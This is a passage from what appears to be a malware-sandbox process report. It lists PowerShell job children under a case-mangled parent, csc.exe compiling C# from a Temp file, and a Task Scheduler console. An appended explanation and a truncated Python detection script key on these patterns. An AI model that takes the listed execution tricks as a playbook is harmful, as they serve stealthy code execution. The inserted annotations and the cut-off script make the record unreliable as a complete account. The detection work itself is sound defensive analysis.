c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll

PID
4176
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
580
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll

PID
5876
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
4136
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
5348
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\atl.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\gpapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll

PID
832
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
3420
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
c:\windows\system32\user32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll

PID
5220
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
1580
CMD
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\qhtxu0wo.cmdline"
Path
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Indicators
No indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Visual C# Command Line Compiler
Version
4.7.2556.0 built by: NET471REL1
Modules
Image
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\combase.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\version.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\microsoft.net\framework64\v4.0.30319\alink.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscorpehost.dll

PID
3740
CMD
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESF066.tmp" "c:\Users\admin\AppData\Local\Temp\CSC3501E91C22C04217AEF1B5C3DF308F7.TMP"
Path
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Indicators
No indicators
Parent process
csc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® Resource File To COFF Object Conversion Utility
Version
12.00.52519.0 built by: VSWINSERVICING
Modules
Image
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\bcryptprimitives.dll

PID
248
CMD
"C:\WINDOWS\system32\mmc.exe" "C:\WINDOWS\system32\taskschd.msc" /s
Path
C:\WINDOWS\system32\mmc.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED: the medium-integrity instance exited and the console was reopened as the HIGH-integrity PID 4756 below)
Version:
Company
Microsoft Corporation
Description
Microsoft Management Console
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\mmc.exe
c:\systemroot\system32\ntdll.dll

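The process records above carry three detection-relevant patterns that are easy to miss when reading a flat listing: the case-mangled parent image name (POWeRsHEll.exe), PowerShell job-host children started with "-Version 5.1 -s -NoLogo -NoProfile" (the command line Start-Job uses for its server-mode child), and a csc.exe → cvtres.exe chain under PowerShell, which is the footprint of Add-Type / CodeDOM compiling C# at run time. The script below is an added example, not part of the ANY.RUN report and not ANY.RUN's own tooling; it runs that logic over a constructed sample that mirrors the PIDs and command lines on this page. The report lists only the parent's image name, not its PID, so the rules key on names; the ACCEPTED_SPELLINGS allowlist and the NTSTATUS name table are this example's own assumptions and are deliberately minimal.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Proc:
    pid: int
    cmd: str
    parent: str        # parent image name exactly as the report lists it (no parent PID given)
    integrity: str
    exit_code: int


# Constructed sample: mirrors the PIDs and command lines shown on this page.
SAMPLE: List[Proc] = [
    Proc(580, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile',
         "POWeRsHEll.exe", "MEDIUM", 4000),
    Proc(4176, r'\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1', "powershell.exe", "MEDIUM", 0),
    Proc(1580, r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\qhtxu0wo.cmdline"',
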